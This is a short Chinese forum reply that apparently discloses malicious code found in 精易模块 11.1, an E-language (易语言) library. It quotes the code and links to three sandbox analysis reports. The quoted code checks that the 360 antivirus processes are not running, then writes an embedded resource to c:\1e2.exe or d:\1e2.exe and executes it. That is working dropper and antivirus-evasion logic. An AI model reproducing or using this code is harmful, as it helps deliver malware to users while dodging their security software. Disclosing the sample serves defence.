|
8楼
发表于 2024-12-19 02:12:59
|
只看该作者
云南省大理白族自治州
精易模块11.1
.如果 (并且 (等于 (进程_是否存在 (“360tray.exe”, ), 假), 等于 (进程_是否存在 (“HipsMain.exe”, ), 假)))
.如果真 (目录_是否存在 (“c:\”))
写到文件 (“c:\1e2.exe”, #匿名图片_2136)
运行 (“c:\1e2.exe”, 假, )
.如果真结束
.如果真 (等于 (目录_是否存在 (“c:\”), 假))
写到文件 (“d:\1e2.exe”, #匿名图片_2136)
运行 (“d:\1e2.exe”, 假, )
.如果真结束
.否则
.如果结束
分析报告:
https://sandbox.dbappsecurity.com.cn/report/16a3b739-ac86-403d-83a8-39749e7090b3
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AZPa23GsONZSmF3-0eZo
https://sandbox.freebuf.com/reportDetail?fileSha1=65f3e291f0a6ddc3b0fd1c58dd12376efc022d0b
|
|